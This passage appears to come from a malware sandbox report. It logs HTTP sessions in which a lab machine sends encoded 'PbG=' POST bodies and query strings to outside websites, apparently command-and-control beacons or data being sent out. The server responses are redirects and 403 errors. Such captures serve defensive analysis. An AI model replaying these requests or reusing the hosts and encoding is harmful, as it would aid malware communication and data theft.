                                                                                                                                                    Data Ascii: PbG=jaHEKjciMc7j1DSwB6Fcig09iHQCbZ0zpllBnC5xmYscJWBdc4xee5vgsbX1rO4tLP4aOQmiEFl6PSnBBTX9vbSoXi8S0ubN2QXX6SAglkMr7yvRoA+HRMc+DtuJ90QFTmzwzqQnOKxnYBVeXvgx3sRAcIPj07aFb7basqIEBMBxM50N9+U6LrHnYfeClL+Gwg==
                                                                                                                                                    Oct 4, 2024 12:02:51.900362015 CEST383INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Connection: close
                                                                                                                                                    x-powered-by: PHP/8.3.11
                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                    x-redirect-by: WordPress - Really Simple Security
                                                                                                                                                    location: https://www.jennarauten.com/h9tv/
                                                                                                                                                    content-length: 0
                                                                                                                                                    date: Fri, 04 Oct 2024 10:02:02 GMT
                                                                                                                                                    server: LiteSpeed


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    70192.168.11.204980231.217.192.15880
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:02:53.830348015 CEST713OUTPOST /h9tv/ HTTP/1.1
                                                                                                                                                    Host: www.jennarauten.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.jennarauten.com
                                                                                                                                                    Referer: http://www.jennarauten.com/h9tv/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 6a 61 48 45 4b 6a 63 69 4d 63 37 6a 6e 54 69 77 44 62 46 63 6e 41 30 2b 2f 33 51 43 4d 4a 30 33 70 6c 35 42 6e 48 4a 68 6d 71 34 63 48 57 78 64 66 35 78 65 53 5a 76 67 6d 37 58 73 76 4f 35 68 4c 50 45 6b 4f 52 61 69 45 46 78 36 50 51 50 42 55 79 58 2b 74 4c 53 71 65 43 38 63 77 75 62 4e 32 51 58 58 36 53 55 4f 6c 6e 38 72 36 43 2f 52 70 68 2b 49 4e 63 63 39 54 4e 75 4a 35 30 52 4d 54 6d 7a 53 7a 72 4e 41 4f 49 35 6e 59 45 52 65 58 2b 67 79 39 73 51 4c 59 49 4f 6f 34 37 58 4c 57 6f 62 6e 39 61 64 61 47 76 46 50 45 50 6c 58 67 4d 67 65 49 34 62 56 63 76 6e 71 6e 4a 2f 64 74 74 6f 45 33 53 59 31 47 67 31 55 42 7a 73 50 79 69 44 42 73 57 67 3d
                                                                                                                                                    Data Ascii: PbG=jaHEKjciMc7jnTiwDbFcnA0+/3QCMJ03pl5BnHJhmq4cHWxdf5xeSZvgm7XsvO5hLPEkORaiEFx6PQPBUyX+tLSqeC8cwubN2QXX6SUOln8r6C/Rph+INcc9TNuJ50RMTmzSzrNAOI5nYEReX+gy9sQLYIOo47XLWobn9adaGvFPEPlXgMgeI4bVcvnqnJ/dttoE3SY1Gg1UBzsPyiDBsWg=
                                                                                                                                                    Oct 4, 2024 12:02:54.850675106 CEST383INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Connection: close
                                                                                                                                                    x-powered-by: PHP/8.3.11
                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                    x-redirect-by: WordPress - Really Simple Security
                                                                                                                                                    location: https://www.jennarauten.com/h9tv/
                                                                                                                                                    content-length: 0
                                                                                                                                                    date: Fri, 04 Oct 2024 10:02:05 GMT
                                                                                                                                                    server: LiteSpeed


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    71192.168.11.204980331.217.192.15880
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:02:56.550652981 CEST1289OUTPOST /h9tv/ HTTP/1.1
                                                                                                                                                    Host: www.jennarauten.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.jennarauten.com
                                                                                                                                                    Referer: http://www.jennarauten.com/h9tv/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 6a 61 48 45 4b 6a 63 69 4d 63 37 6a 6e 54 69 77 44 62 46 63 6e 41 30 2b 2f 33 51 43 4d 4a 30 33 70 6c 35 42 6e 48 4a 68 6d 72 41 63 48 6b 35 64 4e 61 4a 65 54 5a 76 67 71 62 58 70 76 4f 35 6f 4c 50 73 6f 4f 52 57 79 45 41 31 36 4a 44 33 42 51 32 6a 2b 33 62 53 71 42 53 38 52 30 75 62 59 32 51 48 54 36 53 45 4f 6c 6e 38 72 36 48 7a 52 75 77 2b 49 50 63 63 2b 44 74 75 46 39 30 52 6b 54 6d 72 6f 7a 72 5a 36 4f 34 5a 6e 5a 6b 68 65 52 4d 49 79 67 38 51 4a 66 49 4f 37 34 37 62 41 57 6f 48 52 39 61 6f 33 47 73 31 50 48 4a 56 4c 34 50 34 2f 55 50 69 43 51 4e 6e 39 32 36 62 55 73 76 56 35 6d 44 5a 5a 46 6c 74 42 42 69 78 43 70 51 2f 46 76 43 47 36 6c 36 43 50 30 45 57 74 44 72 75 72 6f 75 4f 39 67 68 35 73 49 54 69 47 56 6a 7a 42 61 32 73 36 4e 56 46 37 67 6d 57 63 4f 4b 32 32 4c 58 47 48 41 6d 4b 51 2f 57 6a 59 6f 69 6f 4e 70 47 56 78 51 33 38 32 2b 62 2b 4c 36 74 71 75 4a 36 72 6b 51 30 75 54 79 6f 50 46 51 56 7a 4e 59 58 70 74 7a 68 59 4f 50 43 46 50 50 69 76 62 73 65 6d 63 59 37 70 37 75 78 [TRUNCATED]
                                                                                                                                                    Data Ascii: PbG=jaHEKjciMc7jnTiwDbFcnA0+/3QCMJ03pl5BnHJhmrAcHk5dNaJeTZvgqbXpvO5oLPsoORWyEA16JD3BQ2j+3bSqBS8R0ubY2QHT6SEOln8r6HzRuw+IPcc+DtuF90RkTmrozrZ6O4ZnZkheRMIyg8QJfIO747bAWoHR9ao3Gs1PHJVL4P4/UPiCQNn926bUsvV5mDZZFltBBixCpQ/FvCG6l6CP0EWtDrurouO9gh5sITiGVjzBa2s6NVF7gmWcOK22LXGHAmKQ/WjYoioNpGVxQ382+b+L6tquJ6rkQ0uTyoPFQVzNYXptzhYOPCFPPivbsemcY7p7uxa09FNhWH0nLL6Mg2cb9Y5C02xmOOJhDQ1Zxx5MdL/DnStk/F9sK8kFEdOvu1/knktotfJVlSRdSdjk2WJ804m80eTAbM01dJMtONXOOcl+nJMCcZBQhQitLTpD95c3azrcsFWTcpheK/UdM0zEDMETpdKpBWufyf75ZFrTTJ6KdNNX5aP8htfdsSqClVuYczJVtdZqGelPgkS+VG6VkaLrtFFCwXTMQH1U8xyfBBYc6s7Readxl1tWVc2YeA0XmUJDT2AB7WFpVMz2fG8IAnCSCBc1QO9YtZJZhAZq84/lLMUOVNDoKjRQ18LoJm/DUHpmSG+kfbF6KSwJGAFoTiIiNAFzny8F5fSCf/4Jk+tmzhM1J2tyfLaAf7d8B7gFa4EAQu+dMeivyL6Eon6ECdQFsuMc+YWb15NxwRhVoHc1dcGrkvkhk4GiaJB7gYEcmali54Eaak2
                                                                                                                                                    Oct 4, 2024 12:02:56.550703049 CEST5629OUTData Raw: 4d 36 65 34 56 37 4f 58 44 50 74 39 46 77 4a 57 55 32 48 65 2f 46 67 56 36 34 55 78 67 74 4d 41 4c 31 79 70 4d 36 4b 32 66 76 42 68 69 46 49 68 43 76 5a 72 6b 6e 34 56 75 54 59 6b 65 4f 58 71 4d 5a 38 7a 33 53 6f 71 32 45 2f 68 33 34 5a 5a 79 6b
                                                                                                                                                    Data Ascii: M6e4V7OXDPt9FwJWU2He/FgV64UxgtMAL1ypM6K2fvBhiFIhCvZrkn4VuTYkeOXqMZ8z3Soq2E/h34ZZykJ2VyYWvOVE/i8JyZEqmuEXTy/v03vVMV9D+mcWRELVUtrk8mchmtWRWEeMUYeEXrbaVXxot1DIRevYpDgzX3eV3oc6zfaauO0ILZwobP7NitDucHXL5MWdYjbfqUoaUdpiraljSg0mX5Ooc65C1RjJMuArJb/zQtt
                                                                                                                                                    Oct 4, 2024 12:02:57.664015055 CEST383INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Connection: close
                                                                                                                                                    x-powered-by: PHP/8.3.11
                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                    x-redirect-by: WordPress - Really Simple Security
                                                                                                                                                    location: https://www.jennarauten.com/h9tv/
                                                                                                                                                    content-length: 0
                                                                                                                                                    date: Fri, 04 Oct 2024 10:02:07 GMT
                                                                                                                                                    server: LiteSpeed


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    72192.168.11.204980431.217.192.15880
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:02:59.282289982 CEST429OUTGET /h9tv/?PbG=uYvkJTgHEMDqnDyAL7Bx5kFK4VB5WoBnzEJCknt6lKw0HVhBOb4vRoriyZLI8rcuBPdsMwWdB0wPJQDcXjXv1IKIZ3835bSH0Rj2yj0ArB004lLFoiTrAbQ=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.jennarauten.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:03:01.168243885 CEST526INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Connection: close
                                                                                                                                                    x-powered-by: PHP/8.3.11
                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                    x-redirect-by: WordPress - Really Simple Security
                                                                                                                                                    location: https://www.jennarauten.com/h9tv/?PbG=uYvkJTgHEMDqnDyAL7Bx5kFK4VB5WoBnzEJCknt6lKw0HVhBOb4vRoriyZLI8rcuBPdsMwWdB0wPJQDcXjXv1IKIZ3835bSH0Rj2yj0ArB004lLFoiTrAbQ=&m2W4y=eLqP3zSpfDT
                                                                                                                                                    content-length: 0
                                                                                                                                                    date: Fri, 04 Oct 2024 10:02:11 GMT
                                                                                                                                                    server: LiteSpeed


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    73192.168.11.2049805191.101.104.16480
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:03:06.278040886 CEST690OUTPOST /6s2u/ HTTP/1.1
                                                                                                                                                    Host: www.taketechai.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.taketechai.com
                                                                                                                                                    Referer: http://www.taketechai.com/6s2u/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 47 79 6b 69 79 30 70 75 4b 42 41 64 4a 78 35 50 50 53 65 44 31 2b 38 6a 51 72 37 61 52 2b 66 78 55 73 52 64 50 42 78 2f 44 67 73 57 68 50 54 49 43 2b 4c 71 58 4c 4f 72 55 69 38 6d 50 71 36 47 67 36 56 63 6c 53 36 4d 77 53 32 35 41 6c 54 61 53 43 6d 2b 70 6a 2f 33 49 38 46 36 53 53 67 65 42 59 4c 4e 4b 53 49 7a 61 2b 56 30 74 56 79 30 45 52 56 76 45 33 6e 53 53 38 76 46 55 72 7a 57 52 45 38 30 74 69 7a 4d 5a 55 44 54 56 6f 36 49 6a 32 6d 4c 52 56 58 75 78 53 69 4e 4b 6f 58 63 6a 79 6d 69 75 63 62 6c 5a 38 45 46 42 65 4c 44 79 46 34 2b 37 64 6a 73 77 63 43 63 75 61 30 6b 62 51 3d 3d
                                                                                                                                                    Data Ascii: PbG=Gykiy0puKBAdJx5PPSeD1+8jQr7aR+fxUsRdPBx/DgsWhPTIC+LqXLOrUi8mPq6Gg6VclS6MwS25AlTaSCm+pj/3I8F6SSgeBYLNKSIza+V0tVy0ERVvE3nSS8vFUrzWRE80tizMZUDTVo6Ij2mLRVXuxSiNKoXcjymiucblZ8EFBeLDyF4+7djswcCcua0kbQ==
                                                                                                                                                    Oct 4, 2024 12:03:06.873116016 CEST425INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                    Server: hcdn
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:03:06 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 163
                                                                                                                                                    Connection: close
                                                                                                                                                    Location: /6s2u/
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    x-hcdn-request-id: 8d6a87c941d981c0a3cda304171662be-bos-edge4
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 68 63 64 6e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>hcdn</center></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    74192.168.11.2049806191.101.104.16480
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:03:08.904134035 CEST710OUTPOST /6s2u/ HTTP/1.1
                                                                                                                                                    Host: www.taketechai.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.taketechai.com
                                                                                                                                                    Referer: http://www.taketechai.com/6s2u/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 47 79 6b 69 79 30 70 75 4b 42 41 64 4c 52 70 50 4e 31 79 44 7a 65 38 73 4f 37 37 61 49 75 66 39 55 73 64 64 50 41 31 57 43 56 45 57 67 76 6a 49 44 2f 4c 71 61 72 4f 72 4d 79 38 6a 41 4b 36 37 67 39 63 68 6c 54 47 4d 77 53 79 35 41 68 58 61 54 78 65 78 72 7a 2f 31 51 4d 46 34 57 53 67 65 42 59 4c 4e 4b 57 68 57 61 2b 4e 30 74 46 43 30 4c 51 56 6f 61 6e 6e 56 58 4d 76 46 46 62 7a 53 52 45 39 68 74 6a 76 32 5a 52 48 54 56 70 4b 49 6a 6b 65 49 49 6c 58 6b 38 79 6a 69 43 71 6d 78 6b 41 53 65 6d 63 66 66 65 75 77 42 4e 6f 61 5a 76 33 4d 61 34 4f 2f 65 30 73 37 30 73 59 31 2f 47 58 72 79 4b 66 59 47 4d 46 48 31 70 36 7a 52 38 4a 43 49 35 62 30 3d
                                                                                                                                                    Data Ascii: PbG=Gykiy0puKBAdLRpPN1yDze8sO77aIuf9UsddPA1WCVEWgvjID/LqarOrMy8jAK67g9chlTGMwSy5AhXaTxexrz/1QMF4WSgeBYLNKWhWa+N0tFC0LQVoannVXMvFFbzSRE9htjv2ZRHTVpKIjkeIIlXk8yjiCqmxkASemcffeuwBNoaZv3Ma4O/e0s70sY1/GXryKfYGMFH1p6zR8JCI5b0=
                                                                                                                                                    Oct 4, 2024 12:03:09.004973888 CEST1003INHTTP/1.1 403 Forbidden
                                                                                                                                                    Server: hcdn
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:03:08 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 149
                                                                                                                                                    Connection: close
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                    Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                    Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    x-hcdn-request-id: 9aeb5fa323d8e82ef1c26dd1cee21776-bos-edge2
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 68 63 64 6e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>hcdn</center></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    75192.168.11.2049807191.101.104.16480
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:03:11.526844025 CEST1289OUTPOST /6s2u/ HTTP/1.1
                                                                                                                                                    Host: www.taketechai.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.taketechai.com
                                                                                                                                                    Referer: http://www.taketechai.com/6s2u/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 47 79 6b 69 79 30 70 75 4b 42 41 64 4c 52 70 50 4e 31 79 44 7a 65 38 73 4f 37 37 61 49 75 66 39 55 73 64 64 50 41 31 57 43 56 63 57 67 65 44 49 43 63 54 71 62 72 4f 72 53 69 38 69 41 4b 36 63 67 38 35 71 6c 54 4c 78 77 51 36 35 44 45 44 61 62 67 65 78 69 7a 2f 31 4d 38 46 37 53 53 68 45 42 59 62 4a 4b 53 46 57 61 2b 4e 30 74 47 61 30 43 68 56 6f 59 6e 6e 53 53 38 76 4a 55 72 7a 71 52 41 51 57 74 6a 61 42 65 6c 7a 54 56 4a 61 49 76 33 6d 49 41 6c 58 71 79 53 6a 36 43 71 71 79 6b 41 65 6f 6d 63 72 35 65 70 4d 42 65 4d 62 5a 30 46 49 69 73 4e 48 68 36 59 33 2b 6d 49 78 77 44 6d 37 72 4e 35 41 66 44 42 6a 77 6d 4a 50 62 75 4a 2b 35 75 64 79 46 7a 49 50 31 46 6f 7a 6e 2f 66 53 36 64 4d 6b 6d 53 42 52 72 67 63 79 6f 4b 38 4e 5a 71 68 64 54 42 41 45 49 63 38 33 6c 7a 55 38 43 37 6f 46 54 4d 50 71 6b 55 64 2f 4e 76 71 36 5a 49 41 52 4f 58 56 42 34 72 6c 4f 6a 4b 6a 54 4e 79 37 76 51 7a 37 6f 76 70 4b 48 50 52 62 58 4a 71 6f 2f 2f 35 79 30 4c 77 35 77 30 6f 45 57 33 71 62 73 70 6d 4c 49 66 75 78 [TRUNCATED]
                                                                                                                                                    Data Ascii: PbG=Gykiy0puKBAdLRpPN1yDze8sO77aIuf9UsddPA1WCVcWgeDICcTqbrOrSi8iAK6cg85qlTLxwQ65DEDabgexiz/1M8F7SShEBYbJKSFWa+N0tGa0ChVoYnnSS8vJUrzqRAQWtjaBelzTVJaIv3mIAlXqySj6CqqykAeomcr5epMBeMbZ0FIisNHh6Y3+mIxwDm7rN5AfDBjwmJPbuJ+5udyFzIP1Fozn/fS6dMkmSBRrgcyoK8NZqhdTBAEIc83lzU8C7oFTMPqkUd/Nvq6ZIAROXVB4rlOjKjTNy7vQz7ovpKHPRbXJqo//5y0Lw5w0oEW3qbspmLIfuxNtu2sKLQw90v2Up9C50hpRGd3zx0oki5CFrc1HLBXfJGkS9u9yRABxe08GvRBg9qLI28/2djkatxyIqlyGW1VNLtvmGlJU8J6QvEJNZ1AyptfPF/d+UJfRNFBrdIIWP2tSVIwI00SLbIGtOANIqw0XrVF8tnjBmqdtNngh/xmUWmt2drkoWuqWF9UwfFTgP/sqlmRSGyNuv5EQabqBpbN5swW9rf7XBcWsiBjjX7O4HyC2Uxhl9t4SK9ot5BUL9iZ/+yzRL9Kw7ffqaJlyTw8ogzXzfxfhRnPyv82qNEsVzHrdWDXM5mT+0UCL0YbRLkwAyyshSEkl/BuUmun5SsD0KaqkFMJclGXdQre/DGixLpWHMws5sSiHVviOkryttkgdQJIjb+8QuyjV08S2jZsEOnMl6uHhakhbiI/QMhcb6KUJMP7aVVjn09GJBEBeCCFE1LGs7BH09J
                                                                                                                                                    Oct 4, 2024 12:03:11.526892900 CEST5626OUTData Raw: 34 2b 39 37 59 4e 4e 51 7a 6c 66 32 4b 30 2b 66 75 74 55 48 4a 33 4c 32 62 63 70 54 64 6a 4c 71 59 44 41 54 6f 6a 2f 67 47 35 50 55 31 78 4c 6c 67 72 36 5a 30 75 49 6e 35 43 32 72 62 4f 48 7a 6f 65 7a 52 7a 56 69 4d 75 50 4f 54 30 30 75 6a 35 37
                                                                                                                                                    Data Ascii: 4+97YNNQzlf2K0+futUHJ3L2bcpTdjLqYDAToj/gG5PU1xLlgr6Z0uIn5C2rbOHzoezRzViMuPOT00uj579Ff6/qAIR9Mv05TV+MbwYI5MEAIa4rcZi2HX5/xZATeXlUxhhhZPekwxoKgremREDOIdYu5gqy1NoCK9a7pud7DAx18SR1z9lM306H5iMz5xxYX3/oMKiD6vavrhYt5VCZEe3evPglBddrh4QBdyMIC3ZPXjxOOgf
                                                                                                                                                    Oct 4, 2024 12:03:11.627345085 CEST1003INHTTP/1.1 403 Forbidden
                                                                                                                                                    Server: hcdn
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:03:11 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 149
                                                                                                                                                    Connection: close
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                    Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                    Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    x-hcdn-request-id: 65c4a942774adc74f6804865fdc49307-bos-edge4
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 68 63 64 6e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>hcdn</center></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    76192.168.11.2049808191.101.104.16480
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:03:14.152014017 CEST428OUTGET /6s2u/?PbG=LwMCxBNtIktrMj9PGQiKtMV+LJeqJuCob/kDIT9BHmAZvs3jLOO+ZrbeOg0/fIrrzLQ8oyXz+hXEDm3lfyah8CLsJZYqemFEXJ3vaUcAfohhzVyFGy0IUEQ=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.taketechai.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:03:14.253379107 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                    Server: hcdn
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:03:14 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 4792
                                                                                                                                                    Connection: close
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                    Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                    Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    x-hcdn-request-id: 58e7463fe1aea6dfc0061e5240fcba10-bos-edge1
